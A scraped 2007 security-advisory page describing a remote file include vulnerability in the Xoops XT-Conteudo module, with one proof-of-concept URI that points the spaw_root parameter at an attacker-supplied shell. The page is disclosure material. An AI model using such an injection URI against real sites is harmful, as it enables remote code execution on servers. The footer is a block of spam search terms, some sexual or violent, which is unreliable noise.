about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Xoops XT-Conteudo Module Spaw_Control.Class.PHP Remote File Include Vulnerability


Title Xoops XT-Conteudo Module Spaw_Control.Class.PHP Remote File Include Vulnerability
Published 2007-06-14-12:00AM
Updated 2007-06-14-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  g00ns is credited with the discovery of this vulnerability.
Vulnerable  Xoops XTConteudo Module 1.52
Not Vulnerable  
Code   Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[ shell ]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 09 Dec 2009 03:40:25 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
latinas Nude rekha Sania mirz PHP/5.1.4 news for c www.dilong www.65887. www.hot se Crack Data Www.sextv. www.hqzj08 koolcl Sania mirz Foto seksi www.18yers news for c www.milta1 PHP+guestb www.60733. www.sz-lk. apache 1.3 Crack Data www.qirui1 xxnx.com SSH Server IB xxnx.com news for c /search/ex FREESEXFIL Nudeaishwa SQL Inject t289t Cyntya wij Fotos sex Vbulitten php-nuke 2 www.szpazl OpenSSH_3. Indiansexy search/exp www.yswqt. www.socttc RAPE SEX V SOLDIER BO news for c Pakistanse www.waptri flashschat joomla 1.0